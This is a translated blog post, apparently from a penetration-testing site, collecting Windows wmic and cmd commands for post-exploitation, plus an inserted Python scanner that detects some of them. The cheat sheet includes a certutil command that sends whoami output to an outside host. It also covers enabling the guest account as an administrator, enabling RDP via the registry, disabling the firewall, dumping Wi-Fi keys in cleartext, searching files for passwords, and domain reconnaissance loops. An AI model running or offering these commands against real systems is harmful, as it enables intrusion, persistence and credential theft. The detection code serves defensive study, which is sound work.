Windows command summary

Author: CSeroad | Published 2019-12-06 17:23

    Preface

    I collected some commands here, not only wmic commands but other fun ones too.

    wmic command summary

    View installed patch (hotfix) details

    wmic qfe list

    List processes

    wmic process list brief

    Get process paths

    wmic process get description,executablepath
    wmic process where name="java.exe" get executablepath

    Find a PID by application name

    wmic process where name="cmd.exe" get processid,executablepath,name

    Get full details of a process

    wmic process where name="chrome.exe" list full

    Create a new process

    wmic process call create notepad
    wmic process call create "C:\Program Files\Tencent\qq.exe"
    wmic process call create "shutdown.exe -r -f -t 20"

    Terminate a specified process

    wmic process where name="qq.exe" call terminate
    wmic process where processid="2316" delete
    wmic process 2316 call terminate

    View startup items

    wmic startup

    View shares

    wmic share get name,path

    View installed software and versions

    wmic product get name,version

    Check whether the machine is a virtual machine

    wmic bios list full | find /i "vmware"

    Get the machine name

    wmic path win32_computersystem get dnshostname

    Get the operating system name

    wmic path win32_operatingsystem get name

    Check whether the system is 32-bit or 64-bit

    wmic path win32_operatingsystem get osarchitecture

    Get the system's domain

    wmic path win32_computersystem get domain

    Get antivirus (AV) details

    wmic /namespace:\\root\securitycenter2 path antivirusproduct GET displayName,productState,pathToSignedProductExe

    base64 encode

    certUtil -encode 1.jsp 1.txt

    base64 decode

    certUtil -decode 1.txt 1.jsp

    cmd command summary

    Redirect output (including errors) to a file

    net user > a.txt 2>&1

    View processes with their services

    tasklist /svc

    Kill a process by image name

    taskkill /f /im shell.exe

    Kill a process by PID

    taskkill /pid 5396 /F

    Trace the route to a host

    tracert IP

    DNS lookup

    nslookup domain

    View logged-on users (sessions)

    qwinsta

    View the routing table

    route print

    View scheduled tasks

    schtasks /query /fo list /v

    Works a bit like vim: type the file contents, press Ctrl+Z to finish, and the file is created

    copy con test.vbs

    Recursively search for a file

    cd /d E: && dir /b /s Logon.aspx

    DNS out-of-band command execution

    for /f %i in ('whoami') do certutil -urlcache -split -f http://x.x.x.x/%i

    Command execution when the host has no outbound network access (results are written to files)

    cd c:\ && for /f %i in ('dir /s /b c:fastjson-1.2.47.jar') do (echo %i> %i.path.txt) & (ipconfig > %i.ipconfig.txt)

    Activate the guest account

    net user guest /active:yes
    net user guest Qax@123456
    net localgroup administrators guest /add

    Recursively search file contents (files with these extensions that contain the keyword "password")

    findstr /si password config.* *.ini *.txt

    Check whether 3389 (Remote Desktop) is enabled

    REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections

    0x1 means disabled, 0x0 means enabled.

    Enable 3389 by modifying the registry

    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

    REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

    Two variants are collected here.

    Find the port used by the TermService service (replace PID with the PID shown by the first command)

    tasklist /svc | findstr "TermService"
    netstat -ano | find "PID"

    Batch scan for live hosts on the internal network

    for /l %i in (1,1,255) do @ping 10.0.0.%i -w 1 -n 1 | find /i "ttl"

    Batch net view, printing each machine name and IP

    FOR /F "eol=- tokens=1 delims=\ " %a IN ('net view') DO @(echo name: %a, ip: & ping %a -w 1 -n 1 | find /i "ttl" & echo.)

    Batch search for live hosts across a class B (/16) range; save as a batch file.

    @echo off
    for /l %%i in (1,1,255) do (
        for /l %%j in (1,25,255) do (
          @ping -w 1 -n 1 10.0.%%i.%%j | find /i "ttl="
        )
    )

    Disable the firewall

    Windows Server 2003 and earlier

    netsh firewall set opmode disable

    Windows Server 2003 and later

    netsh advfirewall set allprofiles state off

    Add a firewall rule

    netsh advfirewall firewall add rule name=cs dir=in action=allow protocol=TCP localport=6666

    View the firewall policy

    netsh firewall show config
    netsh firewall show state

    View wireless passwords (replace "profiles" with a profile name listed by the first command)

    netsh wlan show profiles
    netsh wlan show profiles name="profiles" key=clear
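The defender's counterpart to the 3389 registry toggle, guest-account activation, firewall changes, certutil fetch and wlan key commands above, added here as an example that is not part of the original post: a small Python scanner that matches process-creation command lines against signatures for exactly those commands and flags hosts where several of them cluster. The finding names, the regexes and the sample records (hosts, users, command lines) are constructed assumptions for this example.

```python
import re
from collections import defaultdict

# Signatures for command lines collected on this page, keyed by finding name. The names
# and regexes are assumptions made for this example, not Windows or vendor identifiers.
SIGNATURES = {
    "rdp_enabled_via_registry": r"reg\s+add\b.*terminal server.*fdenytsconnections.*/d\s+(0x)?0+\b",
    "guest_account_activated": r"net\s+user\s+guest\s+/active:yes\b",
    "guest_added_to_administrators": r"net\s+localgroup\s+administrators\s+guest\s+/add\b",
    "firewall_disabled": r"netsh\s+(advfirewall\s+set\s+allprofiles\s+state\s+off|firewall\s+set\s+opmode\s+disable)\b",
    "inbound_allow_rule_added": r"netsh\s+advfirewall\s+firewall\s+add\s+rule\b.*dir=in\b.*action=allow\b",
    "certutil_urlcache_fetch": r"certutil\b.*-urlcache\b.*-f\s+https?://",
    "wlan_key_disclosure": r"netsh\s+wlan\s+show\s+profiles?\b.*key=clear\b",
    "av_enumeration_via_wmic": r"wmic\b.*securitycenter2\b.*antivirusproduct\b",
}
COMPILED = {name: re.compile(pat, re.IGNORECASE) for name, pat in SIGNATURES.items()}

def classify(command_line):
    """Return the sorted finding names whose signature matches one command line."""
    return sorted(name for name, pat in COMPILED.items() if pat.search(command_line))

def scan(events):
    """events: iterable of (host, user, command_line). Returns (host, user, finding) hits."""
    return [(host, user, f) for host, user, cmd in events for f in classify(cmd)]

def noisy_hosts(hits, threshold=2):
    """Hosts with at least `threshold` distinct findings. Any one of these commands can be
    routine administration; several of them on the same host is what merits a look."""
    per_host = defaultdict(set)
    for host, _user, finding in hits:
        per_host[host].add(finding)
    return sorted(h for h, found in per_host.items() if len(found) >= threshold)

# Constructed sample process-creation records (host, user, command line), not real telemetry.
SAMPLE_EVENTS = [
    ("WS01", r"corp\alice", r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'),
    ("WS01", r"corp\alice", "net user guest /active:yes"),
    ("WS01", r"corp\alice", "net  localgroup administrators guest  /add"),
    ("SRV02", r"NT AUTHORITY\SYSTEM", "netsh advfirewall set allprofiles state off"),
    ("SRV02", r"NT AUTHORITY\SYSTEM", "netsh advfirewall firewall add rule name=cs dir=in action=allow protocol=TCP localport=6666"),
    ("WS03", r"corp\bob", "certutil -urlcache -split -f http://x.x.x.x/corp-bob"),
    ("WS03", r"corp\bob", "netsh wlan show profiles"),  # lists profiles only, no key=clear: not flagged
    ("WS03", r"corp\bob", "tasklist /svc"),             # benign
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print("%-6s %-20s %s" % hit)
    print("hosts with clustered findings:", noisy_hosts(scan(SAMPLE_EVENTS)))
```

Feed it real Security 4688 or Sysmon event 1 command lines and tune the threshold per environment; the signatures are deliberately narrow so that the ordinary `tasklist` and `net view` commands on this page do not fire.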
    

    Internal network penetration

    Enable the telnet client

    dism /online /Enable-Feature /FeatureName:TelnetClient

    View domain controllers

    net group "Domain controllers"

    View the current network domain environment

    net view /domain

    View domain admins

    net group "domain admins" /domain

    View all machine names in the domain

    net group "domain computers" /domain

    Find internal assets corresponding to external domains

    for /f "delims=" %i in (domains.txt) do @ping -w 1 -n 1 %i | findstr /c:"test.com" >> service.txt

    domains.txt holds the domain names collected externally; the for loop pings each domain and appends the result to service.txt.

    Find internal IP assets

    for /f "delims=" %i in (web.txt) do @ping -w 1 -n 1 %i | findstr /c:"[10." /c:"[192." /c:"[172." >> out.txt

    To be continued...